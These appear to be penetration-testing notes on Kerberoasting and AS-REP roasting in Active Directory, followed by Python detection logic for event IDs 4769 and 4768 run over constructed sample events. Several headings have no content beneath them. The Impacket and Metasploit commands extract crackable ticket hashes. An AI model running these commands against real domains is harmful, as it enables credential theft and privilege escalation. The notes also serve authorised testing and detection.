Authenticated (Post-Compromise) Attacks

Kerberoasting

Why? Request TGS (service) tickets for accounts that have SPNs; the encrypted portion of each ticket is derived from the service account's password, so it can be cracked offline.

Requirements: Valid domain user credentials (any domain user can perform Kerberoasting)

Attack value: Service accounts often have elevated privileges and/or weaker passwords, providing a direct path to privilege escalation.

Discovery and Extraction

Impacket Method

# Discover and extract Kerberoastable accounts
# Wrap the password in single quotes so the shell does not interpret special characters such as '$'
python3 GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <DC-IP> -request -outputfile kerberoast.txt

# Output to the terminal
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -request

Metasploit Method

# Kerberoasting through Metasploit framework
use auxiliary/gather/kerberoast
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USERNAME <username>
set PASSWORD <password>
run

Offline Cracking


AS-REP Roasting

Why? Target accounts that do not require Kerberos pre-authentication to obtain AS-REP responses whose encrypted portion (the "AS-REP hash") can be cracked offline.

Requirements: Domain credentials OR username list for unauthenticated attempts

Attack Value: Targets accounts with legacy compatibility settings, often easier to crack than TGS hashes
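Both techniques above leave a footprint in the domain controller's Security log: Kerberoasting shows up as bursts of 4769 (TGS request) events with RC4 (0x17) encryption for non-computer service accounts, and AS-REP roasting as 4768 (TGT request) events with Pre-Authentication Type 0. The following detection logic is an added example written for this page, not code from the original notes; the events it runs over are constructed samples, and the threshold of three distinct services is an assumed tuning value.

```python
"""Detect Kerberoasting (4769) and AS-REP roasting (4768) patterns in Security log events."""
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; modern clients negotiate AES (0x12/0x11)

# Constructed sample events (not real telemetry). Field names follow the Windows
# Security log schema for 4768 (TGT request) and 4769 (TGS request).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.31"},
    {"EventID": 4769, "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.31"},
    {"EventID": 4768, "TargetUserName": "legacy_app", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.25"},
    {"EventID": 4768, "TargetUserName": "asmith", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.31"},
]


def is_roastable_tgs(ev):
    """A successful 4769 for a non-computer, non-krbtgt service using RC4 is the classic signal."""
    svc = ev.get("ServiceName", "")
    return (ev["EventID"] == 4769 and ev["Status"] == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect_kerberoasting(events, threshold=3):
    """Return requesters that pulled at least `threshold` distinct RC4 service tickets."""
    per_user = defaultdict(set)
    for ev in events:
        if is_roastable_tgs(ev):
            per_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in per_user.items() if len(svcs) >= threshold}


def detect_asrep_roasting(events):
    """PreAuthType 0 on a successful 4768 means no pre-auth: that AS-REP is crackable offline."""
    return sorted(ev["TargetUserName"] for ev in events
                  if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0"
                  and ev["Status"] == "0x0")
```

In a real deployment, feed the functions parsed 4768/4769 events from a SIEM; the AS-REP check also doubles as an audit list of accounts that should have pre-authentication re-enabled.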

Discovery and Extraction

Impacket Method

CrackMapExec Method

Offline Cracking
